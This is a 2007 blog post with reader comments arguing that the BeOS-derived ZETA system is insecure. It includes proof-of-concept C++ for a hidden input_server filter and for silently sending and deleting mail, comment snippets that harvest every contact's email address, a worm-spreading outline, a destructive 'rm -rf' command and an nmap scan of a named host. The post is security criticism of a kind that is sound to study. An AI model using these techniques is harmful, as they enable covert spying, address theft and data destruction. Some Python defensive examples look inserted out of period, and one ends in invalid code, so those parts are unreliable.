January 4, 2007

secure due to ignorance?

Category: Development — kaldor @ 1:16 am

It's been a long time since I wrote an article about the Magnussoft ZETA operating system (http://www.zeta-os.com), but today I really feel like it. After several weeks I took a look at the news page on www.zeta-os.com and read an entry about security on Magnussoft ZETA. For non-German speakers: it is about the German home secretary Schäuble suggesting that intelligence agencies should be allowed to access the private data on your computer at home.

Magnussoft claims that this is not doable with Magnussoft ZETA, as "it is not possible to examine a system from the outside without notifying the user due to the architecture of this software" ("Die Architektur der Software vereitelt das ein System von außen durchsucht wird, ohne dass der Betreiber davon Kenntnis erlangt").

This is really interesting news, and I guess many people even believe it. I was quite surprised, as the news article got better and better: Magnussoft states that it is not possible to attack a Magnussoft ZETA machine from the internet. Dialers, trojans and hack attacks do not stand a chance.

So, with this said, it is time to analyze these statements, and you will be surprised how easy it is to show that Magnussoft ZETA has many security holes and conceptual issues.

Before you continue reading, I want to make clear that this article is not meant to motivate anyone to develop harmful software, nor to damage Magnussoft's reputation. In addition, all the information you will get is already available on Magnussoft's own developer documentation web page; this is just a collection of hints on where security issues need to be solved. No deep knowledge of the operating system is needed for this. I hope that some of the people responsible for the development of this operating system feel like putting some work into it, to provide the amount of security their marketing is already promising.

Working in the background
If you want to run some code without easily attracting the user's attention, there is one point where you can perfectly start your project. The add-on structure of Magnussoft ZETA loads all add-ons during startup of the different servers, so you have multiple chances to plug into the system: Media Kit, Mail Kit, Translation, etc. But the most convenient way is the input server (http://www.zeta-os.com/cms/custom/API/TheInputServer.html). It gets started very early during the boot process and is needed in any case. Remember, if you get into KDL you are still able to type. As already mentioned, the input_server launches ALL add-ons; there is no check whether the user wants specific add-ons to be loaded or not. Additionally, there is no way to see which add-ons are loaded, even when the user wants to examine the system. You might want to start your own thread during construction of your add-on object, or wait for some specific event.
Just for fun, we let our system do something when the user presses ALT+c to copy an element he has selected. For people not used to this system: BeOS-related operating systems use ALT as the default modifier. Before the window gets the message, the key event goes through our filter by calling the function
virtual filter_result Filter(BMessage* message, BList* outList)
The following code simply implements what has been described above:

#include <add-ons/input_server/InputServerFilter.h>
#include <Alert.h>
#include <List.h>
#include <Message.h>

class NoNotifyFilter : public BInputServerFilter
{
public:
    NoNotifyFilter() { }
    ~NoNotifyFilter() { }

    status_t InitCheck() { return B_OK; }
    filter_result Filter(BMessage*, BList*);
};

filter_result
NoNotifyFilter::Filter(BMessage* msg, BList*)
{
    // Every input event passes through here before the target window sees it.
    if (B_KEY_DOWN == msg->what) {
        int32 mod = 0;
        msg->FindInt32("modifiers", &mod);
        if (mod & B_COMMAND_KEY) {      // ALT, the Be command key, is held
            int32 keyValue = 0;
            msg->FindInt32("key", &keyValue);
            if (keyValue == 78) {       // 78 (0x4e) is the key code of 'c' in the default keymap
                (new BAlert("Hey", "There was something going on in the background.\nHave you been notified?\n", "Oh bummer"))->Go(NULL);
            }
        }
    }
    return B_DISPATCH_MESSAGE;          // pass the event on unchanged
}

// Entry point the input_server looks up in every filter add-on it finds.
extern "C" { BInputServerFilter* instantiate_input_filter(); }
BInputServerFilter*
instantiate_input_filter()
{
    return new NoNotifyFilter();
}

Summary:
- no startup control
- no validation for add-on rights
- no information about loaded/running add-ons
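The three points above boil down to the user having no inventory of what the input_server will load. As an added example (my own, not code from this article or from Magnussoft), here is a small baseline audit in Python that hashes every file under the input_server add-on directories and reports anything added, changed or removed since the baseline was recorded. The directory layout (beos/system/add-ons/input_server and home/config/add-ons/input_server below /boot, each with devices, filters and methods subfolders) is assumed from BeOS R5 conventions, and the default baseline file location is my own choice.

```python
"""Baseline audit of input_server add-on directories (added example, not ZETA code).

Records a sha256 per add-on file and diffs a later run against that baseline,
so the user gets the 'which add-ons are there' listing the input_server itself
does not offer.
"""
import hashlib
import json
import os

# Assumed (BeOS R5 layout): the roots the input_server scans, relative to /boot.
ADDON_DIRS = (
    "beos/system/add-ons/input_server",
    "home/config/add-ons/input_server",
)
KINDS = ("devices", "filters", "methods")


def sha256_file(path):
    """Hash a file in chunks so large add-ons do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(boot_root):
    """Map each add-on's path (relative to boot_root) to its sha256.

    os.path.isfile() follows symlinks, so a link dropped into the folder is
    hashed like a regular file and shows up in the report.
    """
    found = {}
    for base in ADDON_DIRS:
        for kind in KINDS:
            d = os.path.join(boot_root, base, kind)
            if not os.path.isdir(d):
                continue
            for name in sorted(os.listdir(d)):
                full = os.path.join(d, name)
                if os.path.isfile(full):
                    found[os.path.join(base, kind, name)] = sha256_file(full)
    return found


def save_baseline(boot_root, baseline_path):
    """Record the current inventory as the trusted baseline and return it."""
    inv = inventory(boot_root)
    with open(baseline_path, "w") as f:
        json.dump(inv, f, indent=2, sort_keys=True)
    return inv


def audit(boot_root, baseline_path):
    """Return {'added': [...], 'modified': [...], 'removed': [...]} vs. the baseline."""
    with open(baseline_path) as f:
        base = json.load(f)
    now = inventory(boot_root)
    return {
        "added": sorted(p for p in now if p not in base),
        "modified": sorted(p for p in now if p in base and now[p] != base[p]),
        "removed": sorted(p for p in base if p not in now),
    }


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/boot"
    # Baseline location is an assumption of this example, not a system path.
    baseline = sys.argv[2] if len(sys.argv) > 2 else os.path.join(
        root, "home", "config", "settings", "input_server_addons.json")
    if not os.path.exists(baseline):
        print("no baseline yet; recorded %d add-ons" % len(save_baseline(root, baseline)))
    else:
        report = audit(root, baseline)
        for key in ("added", "modified", "removed"):
            for p in report[key]:
                print(key, p)
        if not any(report.values()):
            print("input_server add-ons unchanged since baseline")
```

Run it once right after installation to record the baseline, then again whenever something looks odd; a filter that appeared in home/config/add-ons/input_server/filters without a package install is exactly the case the article describes.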

Round and round it goes
Now let's take a deeper look at the claim that trojans are not implementable on Magnussoft ZETA. I just want to go into the part about spreading the project to other people. Once again the modular design of this operating system is your best friend. One part of the system is called the Mail Kit (http://www.zeta-os.com/cms/custom/API/TheMailKit.html). In particular we make use of the BMailMessage (http://www.zeta-os.com/cms/custom/API/BMailMessage.html) class. It is said that one big advantage of Magnussoft ZETA is that you can use the Mail Kit to configure your accounts and then use whatever mail application you want, even multiple ones at the same time, as they all use the system bindings. This is really convenient for a user who wants to try out a new mail client, as you do not have to configure your mail settings again and again. But you run into problems at the point where the Mail Kit does not check whether an application is allowed to use it. Once again: the user does not get notified about this. So we create a BMailMessage object and just use its member function
status_t Send(bool send_now = false, bool remove_when_sent = false)
This one uses the default mail account you set up. The second argument is even more important: if you set it to true, you cannot even recognize that you sent this mail, as it gets deleted from the out folder on your boot partition. Further below you can see a code snippet that sends a message to someone while fulfilling the above criteria.
Now you might think that you can easily prevent your system from sending these mails with a software firewall. But it is not the application itself which sends the message. Each mail client just hands the email to the mail_server, which is then responsible for sending the message via SMTP. This means that you would have to deny all mail transfer, or check each mail for admission. And I guess you are really not interested in this, as it is even more annoying than sudo'ing on a Unix system.
Additionally, I forgot to mention one little thing. Who should you send an email to? Try every address thinkable, as sometimes happens? Well, that's not needed. Magnussoft ZETA has a central point for contact management: the People folder in your home directory. All contact information is stored there without any encryption. Names, phone numbers, addresses, birthdates, etc. are available from there, and so are email addresses. So why not just send this mail to all your friends on your contact list?
Once again some code:

#include <stdio.h>
#include <string.h>
#include <E-mail.h>
#include <String.h>

int main(int argc, char* argv[])
{
    if (2 > argc) {
        fprintf(stderr, "You need to specify some content for the email being sent.\n");
        return -1;
    }
    // Join all command line arguments into the mail body.
    BString mailText;
    for (int i = 1; i < argc; i++) {
        mailText += argv[i];
        mailText += " ";
    }

    // The default account configured in the Mail Kit is used; there is no
    // application signature check and no prompt for the user.
    BMailMessage *mail = new BMailMessage();
    mail->AddHeaderField(B_MAIL_TO, "accountAt@domain_that_should_not_exist.com");
    mail->AddHeaderField(B_MAIL_SUBJECT, "special present");
    mail->AddContent(mailText.String(), strlen(mailText.String()));
    // send_now = true hands the message to mail_server right away;
    // remove_when_sent = true deletes the copy from the out folder afterwards.
    mail->Send(true, true);
    delete mail;

    return 0;
}

Leak Summary:
- everyone can send mails
- no application signature check
- no encryption for contact data.
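The leak summary comes down to the mail_server accepting a Send() from any team and the remove_when_sent flag hiding the evidence. As an added example (a model I wrote, not ZETA's mail_server or any Magnussoft code), the Python below sketches the admission check the article says is missing: every request is logged together with the requesting application signature, only allow-listed signatures may send silently, remove_when_sent is not honoured for unknown senders so a copy stays in the out folder, and a recipient list that covers a large part of the People folder is held for user confirmation instead of being sent. The signatures, addresses and the fan-out threshold are constructed values.

```python
"""Model of a mail_server admission policy (added example, not ZETA code).

The article's point is that any application may call BMailMessage::Send()
unnoticed and that a per-application firewall cannot see it, because the
mail_server does the SMTP. This sketch shows what a check at the mail_server
side could look like without prompting for every single message.
"""
from dataclasses import dataclass, field


@dataclass
class SendRequest:
    app_signature: str        # signature of the requesting team (constructed values in the demo)
    recipients: list          # To: addresses
    subject: str
    send_now: bool = False
    remove_when_sent: bool = False


@dataclass
class Decision:
    action: str               # "send", "ask_user" or "reject"
    keep_copy: bool           # whether a copy stays in the out folder regardless of the flag
    reason: str


@dataclass
class MailAdmissionPolicy:
    allowed_signatures: set   # applications the user has approved for silent sending
    contacts: set             # email addresses found in the People folder (constructed here)
    max_contact_fanout: int = 5
    log: list = field(default_factory=list)   # append-only record of every request

    def decide(self, req):
        """Classify one Send() request; every request is logged, whatever the outcome."""
        if not req.recipients:
            decision = Decision("reject", False, "no recipients")
        elif req.app_signature not in self.allowed_signatures:
            # Unknown team: ask the user, and never let it hide the message.
            decision = Decision("ask_user", True,
                                "%s is not allowed to send mail silently" % req.app_signature)
        else:
            hits = len(set(req.recipients) & self.contacts)
            if hits > self.max_contact_fanout:
                # Even a trusted client mailing most of the People folder at once
                # looks like the worm pattern described in the article.
                decision = Decision("ask_user", True,
                                    "recipient list matches %d People entries" % hits)
            else:
                decision = Decision("send", not req.remove_when_sent, "allow-listed sender")
        self.log.append((req.app_signature, list(req.recipients), req.subject, decision.action))
        return decision


def demo():
    """Constructed scenario: one approved mail client, a ten-entry address book."""
    policy = MailAdmissionPolicy(
        allowed_signatures={"application/x-vnd.Example-MailClient"},
        contacts={"friend%d@example.invalid" % i for i in range(10)},
    )
    requests = [
        # an unknown team trying to send and delete the evidence
        SendRequest("application/x-vnd.Unknown-Tool", ["friend0@example.invalid"], "special present", True, True),
        # the approved client sending a normal message
        SendRequest("application/x-vnd.Example-MailClient", ["friend1@example.invalid"], "lunch?", True, False),
        # the approved client suddenly mailing the whole address book
        SendRequest("application/x-vnd.Example-MailClient",
                    ["friend%d@example.invalid" % i for i in range(10)], "test this new app"),
    ]
    return policy, [policy.decide(r) for r in requests]


if __name__ == "__main__":
    policy, decisions in_demo = None, None
```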

To summarize this little excursion into Magnussoft ZETA: it is easily possible to run code without notifying the user and to really harm your system. In addition, you can use a client system without any problem to spread your code to other people, once again without notifying the system's owner. You might argue that sending out a mail will not spread your application, as everyone is aware that harmful code can be attached to a mail. Well, first point: you might get the mail from your friend, so you trust him. Second, Magnussoft states that this is not possible with Magnussoft ZETA, so why not just click on this neat attachment? Third, this is the very same way lots and lots of Microsoft Windows machines get infected each day, each hour, each minute on this planet.

I cannot repeat it often enough: please do not use this as a tutorial to write harmful code. This is nothing other than a proof of concept that Magnussoft has a long way to go to provide their users with the security level they want. In my opinion, this article hopefully opens some eyes to pay more attention to these and other issues. It can still be a great operating system, as can the other BeOS-related operating systems.

Update

20 Comments »

  1. Nice writing. Had almost the same feeling when i read the article on zeta-os.com.
    Never thought of modularity and flexibility as such a security hole. Hopefully someone with the knowledge to fix will read this.

    Greets,
    Marcus

    Comment by atla — January 4, 2007 @ 9:55 am

  2. People see what they want to see and therefore do not see what they do not want to see.

    The argument there is no spyware for BeOS and related systems is simply dumb. The german government would barely use existing spyware. Of course they would/will write new ware and as you can see, BeOS is even one of the easier systems for that task…

    I only can repeat that the makers of BeOS (or now ZETA) are simply lucky that nobody ever intended to write such software and this is the only “security” they have, facing the facts.

    Keep up the hope ;-P
    DasJott

    Comment by DasJott — January 4, 2007 @ 7:35 pm

  3. Quite an interesting read, Maurice.

    A nice little example showing email contact collection from People files would be the cherry on top :)

    Thanks

    Comment by John Drinkwater — January 5, 2007 @ 12:20 am

  4. Email contact collection can be trivially done with nothing more than a command line query, no code needs to be written. I’m not at home so I can’t verify that I have the attribute names right but something like:
    query "BEOS:TYPE=application/x-person && name=*" | xargs catattr email

    would harvest every email address in a contact on the current hard disk.

    Comment by AnEvilYak — January 5, 2007 @ 12:59 am

  5. Was hoping for an API-based example, (BQuery or fs_open_query?) but that’ll do nicely, thanks AnEvilYak.

    Comment by John Drinkwater — January 5, 2007 @ 2:34 am

  6. interesting, but how does any of the malicious code get executed if zeta has all its ports closed by default?

    Comment by sogabe — January 5, 2007 @ 2:56 am

    There are many viruses out there which spread themselves via email. So could that one.
    Send a mail to all contacts on a system with some weird content like “Test this new ZETA application blabla” and attach the binary to the mail.
    As soon as the user is dumb enough to run it (because he does not worry about such stuff) it’ll collect your people data and spread again (You are connected to the internet if you fetch mails, at least most of the time).

    Comment by atla — January 5, 2007 @ 9:44 am

    And well, talking of open ports… This virus could also add an input_server add-on which runs some network code to do some funny RPC stuff :) there you go with the trojan thingy (and your open port).

    Comment by atla — January 5, 2007 @ 9:47 am

  9. For an API-based example:

    #include <Entry.h>
    #include <Query.h>
    #include <Volume.h>
    #include <VolumeRoster.h>

    // A BQuery needs a volume to search; use the boot volume here.
    BVolume bootVolume;
    BVolumeRoster roster;
    roster.GetBootVolume(&bootVolume);

    BQuery query;
    query.SetVolume(&bootVolume);   // must be set before Fetch()
    query.SetPredicate("BEOS:TYPE=application/x-person && name=*");

    if (query.Fetch() == B_OK)
    {
        BEntry entry;
        while (query.GetNextEntry(&entry) == B_OK)
        {
            // do whatever you want with the attributes on this entry.
        }
    }

    Comment by AnEvilYak — January 5, 2007 @ 9:04 pm

    I didn’t read the entire Magnussoft claim. But they substantially said you can’t launch code or “data mine” the computer from outside.

    Does your article prove this is false? No. It proves that as for any other operating system (even OpenVMS), you can write a piece of software that communicates through internet.

    I think the claim was more “a bare installed ZetaOS is secure” than “we guarantee nobody will create a malware that you will install yourself”.

    Beside, as a BeOS user, I can say that BeOS was not more secure than DOS was. I don’t think the new ZetaOS did a lot more.

    Comment by doubleUB — January 5, 2007 @ 10:56 pm

  11. I am a developer on the Haiku project which is recreating BeOS in open source.

    While your efforts to investigate security in Zeta and other BeOS-like operating systems is commendable, I think your examples are not very convincing.

    Both problems you mention would require action by the user. For example if someone emailed a malicious piece of code which installed a bad input_server add-on and then emailed itself out again, the user would still need to click the attachment in the email to activate it. In contrast, Microsoft Outlook on Windows can automatically open attachments, which is why there have been many such pieces of malware for that system.

    So given the kind of access which you assume for both these cases, Linux, Windows, Mac OS X, BSD and pretty much every operating system in existence could have similar “security holes.”

    Now don’t get me wrong, BeOS is not the epitome of security…but that really isn’t its purpose. This is especially true of Haiku, which is meant to be a fairly simple, easy to use desktop system. We don’t expect the CIA to be using Haiku for national secrets. We don’t expect banks to be using Haiku to hold billions of dollars worth of bank account information.

    But we do want home users to feel fairly safe and that their data is reasonably secure. So thanks for the article nonetheless…it has inspired me to think of more dangerous security problems based on my knowledge of the system.

    Regards,
    Ryan Leavengood

    Comment by Ryan Leavengood — January 5, 2007 @ 11:10 pm

  12. Your article implies that the input_server also handles input while in KDL. This is not true. The KDL debugger has its own input mechanism.

    Comment by marcone — January 6, 2007 @ 2:00 am

  13. While the code you show probably works as advertised, you do not address Magnussoft’s claim in any way:
    They claim it is not possible to examine a Zeta system FROM THE OUTSIDE without the user’s knowledge.
    You have shown code running on the system that the user is unaware of (big deal, there is no operating system in the world where this isn’t possible).
    However, the two are completely different things. If I connect a Zeta machine to the Internet, can you examine its harddrive remotely, using the code you posted?

    Comment by marcone — January 6, 2007 @ 2:12 am

  14. Seems the claim is more related to attack from the outside though, not from within the system.

    This primarily involves the network stack while running, which is extremely secure, leaving the machines mostly invisible on the internet until they want something, at which time they become partially visible.

    There are no manners of executing code through the kernel arbitrarily while running thanks almost exclusively to memory protection and the debugger.

    Normally exploits occur at buffer under/over runs, when they hijack and execute code at the terminal point of execution, possibly even correcting the program to prevent it from crashing during the process.

    In BeOS/Zeta at the point of such a run-time error, the debugger is informed of it, and the kernel prevents the attempted access from occurring, at the price of killing the application ( upon exiting the debugger dialog ).

    In this manner, the system becomes rather difficult, if not nearly impossible, to compromise as a whole. And maybe completely impossible from a remote attack, unless the work is done through Firefox or another specific networking application which permits such behavior to execute instructions on the machine, implant a simple command ( cd /boot/;rm -rf * & ), and thus destroy everything on the machine ( very quickly ).

    Well, everything that has the same gid and uid as the running team ( program ).

    Of course, that is, technically, application insecurity
    rather than system insecurity.

    –The loon

    Comment by looncraz — January 6, 2007 @ 4:10 am

  15. Hello marcone,

    it’s true, you probably can’t examine a new Zeta installation from the outside, unless you find a vulnerability in the network stack that allows code execution even when all ports are closed.

    But there is another issue. It’s quite possible that some malicious application has already been released that does apparently nothing unusual, but installs a hidden backdoor. This would allow to examine a Zeta system from the outside, without the user noticing it (I’m aware that the same applies to Haiku and BeOS).

    As far as I know, there is no integrity checker, antivirus software, etc for Zeta available.

    The claim made on the magnussoft website is very frivolous.

    regards
    Marcus

    Comment by Marcus Overhagen — January 6, 2007 @ 5:16 am

    In BeOS/Zeta at the point of such a run-time error, the debugger is informed of it, and the kernel prevents the attempted access from occurring, at the price of killing the application ( upon exiting the debugger dialog ).
    I don’t think so. A buffer over-/underrun “hack” will not be detected by the system. The stack will be overwritten and ‘new’ code will be executed. All without the notice of the kernel.

    Greetings

    Comment by Wiese — January 6, 2007 @ 12:24 pm

    Funny how people one by one came up spelling out security issues for Zeta and relativizing Marcus’ articles after a while.

    Marcus himself saw the missing link in his security revision:
    A screening of a ‘closed’ ZetaOS PC via the Internet through the well known technologies (read the article of MS) is really a ‘hard job’ to complete.

    To make it short:
    This is not simple possible this way - not even with Mojo!

    The system-internal security holes as well as the dumb users’ e-mail attachment opening automatism are not a criterion for criticizing MS’ claim for “user’s all day WWW security”…

    As per se, using BeOS or Zeta connected to the Internet with no service running is safer than any other desktop OS for an _average_ PC user.

    It is a completely different case , when you run Server services or open telnet or whatever or open any mail enclosures from people you don’t know well!

    You can try it out and try to screen/hack/exploit my machine (Zeta, DSL) on turkbug.dyndns.org whenever you want.

    We from TurkBUG weren’t able to hijack neither BeOS R5 nor ZetaOS from the Internet (and believe me we tried a lot). But we can ‘kernel panic’ a Linux machine within 15 seconds for example via the internet (over TCP/IP).

    Good Luck!

    Comment by pasha — January 7, 2007 @ 2:24 am

    People! Sorry for getting off the topic. Suppose I am a simple home user of BeOS, Haiku or Zeta… Why the heck should I care that the CIA or the KGB or whatever can see my HDD content? I’d have a few home made movies on it, 4-5 games and some pictures of my grandma… Do you really think that some crazy security flaw can ruin my day as a user? It would be awful if those people erased my HDD, sure. But come to think of it, all the mentioned systems run on PCs. We’ve all been through the windblows reinstallation because it just won’t work right after 6 days’ use, right? Shouldn’t we look for other things like the lack of decent drivers and stuff? How many people have connected their web cam to a computer running those OSes and managed to get a picture of themselves?
    Trust me, as far as the consumer is concerned nowadays, the devices supported by the system come first and security comes last. So forget about backdoors and think about some decent code for Ati cards or something… Let the governments see my naked lady on the desktop. Maybe the nerd hacking my computer will get a hard-on…

    Comment by Graveyard — January 7, 2007 @ 2:45 am

  19. [root@smorgoth root]# nmap -P0 -v -sS -O turkbug.dyndns.org

    Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2007-01-09 10:06 CET
    Host e177211095.adsl.alicedsl.de (85.177.211.95) appears to be up … good.
    Initiating SYN Stealth Scan against e177211095.adsl.alicedsl.de (85.177.211.95) at 10:06
    Adding open port 8888/tcp
    Adding open port 5190/tcp
    The SYN Stealth Scan took 576 seconds to scan 1644 ports.
    Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
    For OSScan assuming that port 5190 is open and port 38942 is closed and neither are firewalled
    Interesting ports on e177211095.adsl.alicedsl.de (85.177.211.95):
    (The 1642 ports scanned but not shown below are in state: filtered)
    Port State Service
    5190/tcp open aol
    8888/tcp open sun-answerbook
    Device type: PDA|broadband router
    Running: Linux 2.4.X, Panasonic embedded
    OS details: Linux 2.4.6 as on Sharp Zaurus PDA, Panasonic IP Technology Broadband Networking Gateway, KX-HGW200
    Uptime 14.676 days (since Mon Dec 25 18:03:15 2006)
    TCP Sequence Prediction: Class=random positive increments
    Difficulty=1120498 (Good luck!)
    IPID Sequence Generation: All zeros

    Nmap run completed — 1 IP address (1 host up) scanned in 590.208 seconds
    [root@smorgoth root]#

    Comment by NMAP — January 9, 2007 @ 11:21 am

  20. Thx for all the comments about this article. A small update is available at: this page

    Comment by kaldor — January 9, 2007 @ 10:04 pm
